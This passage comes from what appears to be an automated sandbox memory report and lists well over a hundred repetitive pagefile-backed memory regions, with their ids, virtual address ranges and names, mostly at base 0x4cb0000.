	              id = 3078
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3079
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3080
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3081
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3082
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3083
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3084
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3085
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3086
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3087
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3088
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3089
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3090
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3091
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3092
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3093
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3094
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3095
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3096
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3097
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3098
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3099
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3100
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3101
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3102
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3103
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3104
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3105
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3106
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3107
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3108
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3109
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3110
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3111
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3112
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3113
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3114
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3115
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3116
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3117
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3118
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3119
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3120
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3121
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3122
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3123
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3124
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3125
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3126
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3127
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3128
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3129
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3130
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3131
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3132
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3133
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3134
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3135
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3136
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3137
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3138
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3139
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3140
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3141
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3142
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3143
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3144
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3145
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3146
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3147
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3148
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3149
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3150
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3151
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3152
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3153
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3154
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3155
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3156
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3157
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3158
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3159
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3160
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3161
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3162
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3163
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3164
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3165
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3166
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3167
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3168
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3169
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3170
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3171
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3172
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3173
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3174
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3175
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3176
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3177
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3178
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3179
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3180
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3181
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3182
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3183
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3184
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3185
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3186
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3187
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3188
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3189
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3190
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3191
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3192
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3193
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3194
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3195
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3196
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3197
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3198
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3199
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3200
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3201
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3202
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3203
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3204
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3205
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3206
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3207
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3208
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3209
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3210
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3211
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3212
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3213
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3214
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3215
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3216
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3217
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3218
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3219
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3220
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3221
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3222
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3223
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3224
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3225
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3226
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3227
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3228
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3229
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
